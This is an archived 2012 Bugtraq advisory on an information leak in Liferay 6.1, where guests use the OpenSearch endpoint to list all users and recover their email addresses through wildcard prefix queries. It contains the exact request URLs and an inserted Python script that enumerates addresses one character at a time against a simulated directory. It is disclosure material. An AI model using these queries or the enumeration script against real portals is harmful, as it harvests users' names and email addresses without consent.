lists.openwall.net: Open Source and information security mailing list archives
Date: Sun, 13 May 2012 11:41:35 +0200
From: Jelmer Kuperus <jelmer.advisories@...il.com>
To: BUGTRAQ@...urityfocus.com
Subject: Guests can view names and email addresses of all Liferay users in Liferay 6.1

Guests can view names and email addresses of all Liferay users in Liferay 6.1

Description:

Liferay Portal is an enterprise portal written in Java.

As an unauthenticated user (guest) it is possible to retrieve the names and
email addresses of all Liferay users through the portal's OpenSearch endpoint.
To retrieve a list of all users, simply issue the following request:

http://vulnerablehost/c/search/open_search?p=1&c=5000&keywords=entryClassName:com.liferay.portal.model.User

Getting to the email addresses is a bit more involved, because they are
not included in the response. It is still possible to obtain them by
using wildcard searches against the indexed emailAddress field. The
following request returns all users whose email address starts with "b":

http://vulnerablehost/c/search/open_search?p=1&c=5000&keywords=emailAddress:b*

Each such request acts as an oracle: it either returns matching users or
nothing. By adding one letter at a time to the emailAddress value and
keeping only the prefixes that still return results, it is possible to
eventually recover someone's full email address, one character per request.
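To make the per-character extension concrete, the following is an added example written for this page; it is not the advisory's proof of concept from the GitHub link and does not talk to a real portal. It models the endpoint offline: simulated_open_search, SAMPLE_USERS, the candidate alphabet and the exact-match query form emailAddress:<value> (used to decide that a prefix is a complete address) are all assumptions standing in for a live Liferay instance. The advisory itself only shows the wildcard form and the entryClassName query; the walk below combines the two, using the user listing to know how many addresses there are to find.

```python
# Added example (not the advisory's PoC): an offline model of the
# emailAddress prefix-wildcard oracle, showing how extending a prefix
# one character at a time recovers full addresses.
from __future__ import annotations

import string
from typing import Callable

# Constructed sample directory standing in for a Liferay instance's user
# index; a real target would be queried over HTTP instead.
SAMPLE_USERS = {
    "Alice Example": "alice@example.com",
    "Bob Builder": "bob@example.org",
    "Bobby Tables": "bobby@example.org",
}

# Characters tried at each position. Lucene treats some of these as
# operators, so a live query would need them escaped (assumption).
ALPHABET = string.ascii_lowercase + string.digits + ".-_+@"

# The advisory's first query: lists every User entry in the index.
USER_QUERY = "entryClassName:com.liferay.portal.model.User"


def simulated_open_search(keywords: str) -> list[str]:
    """Stand-in for GET /c/search/open_search?keywords=<keywords>.

    Returns the display names of matching users, mirroring the advisory's
    observation that names come back but email addresses do not. Only the
    three query shapes used below are modelled; the exact-match form
    'emailAddress:<value>' is assumed to behave like the prefix form
    without the trailing '*'.
    """
    if keywords == USER_QUERY:
        return list(SAMPLE_USERS)
    field, _, value = keywords.partition(":")
    if field != "emailAddress":
        return []
    if value.endswith("*"):
        prefix = value[:-1]
        return [name for name, email in SAMPLE_USERS.items()
                if email.startswith(prefix)]
    return [name for name, email in SAMPLE_USERS.items() if email == value]


def enumerate_addresses(search: Callable[[str], list[str]],
                        alphabet: str = ALPHABET) -> tuple[set[str], int]:
    """Recover every email address reachable through the prefix oracle.

    Depth-first walk over prefixes: a prefix is extended by one character
    only while 'emailAddress:<prefix>*' still returns at least one user,
    so a dead branch costs a single request. Stops once as many addresses
    have been found as the user listing reports. Returns the addresses
    found and the number of search requests issued.
    """
    total = len(search(USER_QUERY))  # how many users exist at all
    found: set[str] = set()
    queries = 1
    stack = [""]
    while stack and len(found) < total:
        prefix = stack.pop()
        for ch in alphabet:
            candidate = prefix + ch
            queries += 1
            if not search(f"emailAddress:{candidate}*"):
                continue  # no address starts with this: prune the branch
            queries += 1
            if search(f"emailAddress:{candidate}"):
                found.add(candidate)  # an address ends exactly here
            stack.append(candidate)  # a longer address may share this prefix
    return found, queries


if __name__ == "__main__":
    addresses, requests_made = enumerate_addresses(simulated_open_search)
    for address in sorted(addresses):
        print(address)
    print(f"{len(addresses)} addresses recovered with {requests_made} requests")
```

The cost is roughly the alphabet size times the number of distinct prefixes that actually occur, far below the size of the address space, which is why a per-character oracle of this kind leaks the whole directory in practice. If the exact-match query form turns out not to be available on a target, the same walk can be driven from the wildcard responses alone by noting when the set of returned names stops changing between a prefix and its extensions.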

Proof of concept:

Code demonstrating the vulnerability can be found at

https://github.com/jelmerk/liferay-opensearch-exploit

Systems affected:

Liferay 6.1 CE
Liferay 6.1 EE is possibly affected

Vendor status:

Liferay was notified on May 5, 2012 by filing a bug in their public bug
tracker under issue number LPS-27146. The issue has since been marked as
a duplicate of LPS-25877, an issue that one of the core engineers filed,
but not under the security category. That ticket did not mention the
possibility of obtaining the email addresses. The issue is possibly
already silently resolved in the for-pay Enterprise Edition but not in
the Community Edition.
